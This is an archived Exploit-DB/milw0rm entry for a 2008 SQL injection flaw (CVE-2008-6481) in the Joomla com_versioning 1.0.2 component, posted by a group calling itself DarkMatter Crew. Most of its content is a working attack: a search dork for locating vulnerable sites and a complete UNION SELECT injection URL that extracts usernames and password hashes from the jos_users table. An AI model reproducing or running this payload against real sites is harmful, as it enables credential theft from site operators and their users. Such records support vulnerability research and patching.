Joomla Component versioning 1.0.2 id SQL Injection Vulnerability

2008-07-01T00:00:00
ID EDB-ID:5989
Type exploitdb
Reporter DarkMatter Crew
Modified 2008-07-01T00:00:00

Description

Joomla Component versioning 1.0.2 (id) SQL Injection Vulnerability. CVE-2008-6481. Webapps exploit for php platform

                                        
                                            [+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

[+] Team           : DarkMatter Crew

[+] Crew website       : WwW.SykoPainKilla.CoM

[+] Author         : SpK & His0k4

[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com

[+] D0rk      : inurl:index.php?option=com_versioning



[+] Expl0iT :

http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--


#
#
#
#
############################################
                                           #
Visit our website www.sykopainkilla.com    #
                                           #
                                           #
#DarmMatter & SpK F0R3V3R                  #
                                           #
############################################
#
#
#
#


side note:
<name>versioning</name>
<creationDate>11.14.2006</creationDate>
<author>Thomas Papin</author>
<copyright>
This component is released under the GNU/GPL License.
</copyright>
<authorEmail>thomas.papin@free.fr</authorEmail>
<authorUrl>www.joomprod.com</authorUrl>
<version>1.0.2</version>

# milw0rm.com [2008-07-01]